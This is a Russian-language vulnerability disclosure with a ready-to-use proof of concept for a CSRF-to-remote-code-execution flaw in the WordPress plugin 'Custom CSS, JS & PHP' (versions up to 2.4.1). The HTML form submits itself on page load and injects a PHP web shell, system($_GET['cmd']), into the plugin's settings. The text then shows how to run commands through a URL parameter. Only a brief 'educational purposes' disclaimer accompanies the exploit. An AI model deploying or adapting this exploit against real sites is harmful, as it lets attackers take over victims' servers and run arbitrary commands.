
Плагин WordPress Custom CSS, JS & PHP <= 2.4.1 - уязвимость CSRF to RCE
Уязвимость Межсайтовой подделки запроса (CSRF) в плагине WPFactory Custom CSS, JS & PHP позволяет выполнить удаленное выполнение кода (RCE) путем внедрения вредоносного PHP-кода через неавторизованные POST-запросы.
Это затрагивает все версии до 2.4.1 включительно.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:HНиже приведен скриншот, показывающий результат успешной эксплуатации, демонстрирующий, как удаленный код может быть выполнен через параметр URL:


<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>WordPress Custom CSS, JS & PHP plugin <= 2.4.1 - CSRF to RCE vulnerability</title>
</head>
<body onload="document.forms[0].submit()">
<h1>CSRF PoC - WordPress Custom CSS, JS & PHP plugin <= 2.4.1</h1>
<p>By : Nxploited | Khaled Alenazi</p>
<form action="http://192.168.100.74:888/wordpress4/wp-admin/tools.php?page=alg-custom-php" method="POST">
<input type="hidden" name="alg_custom_css_php_enabled" value="1">
<input type="hidden" name="alg_custom_css_php_execute" value="plugins_loaded">
<input type="hidden" name="alg_custom_css_php" value="<?php system($_GET['cmd']); ?>">
<input type="hidden" name="alg_ccjp_submit" value="php">
<noscript><input type="submit" value="Submit"></noscript>
</form>
</body>
</html>
plugins_loaded.http://target-site.com/?cmd=whoami
Данный PoC предназначен только для образовательных целей.
Автор не несет ответственности за любое неправомерное использование или ущерб, вызванный неправильным применением этой информации.
Всегда тестируйте в контролируемых средах и с разрешения.
Автор: Nxploited | Khaled Alenazi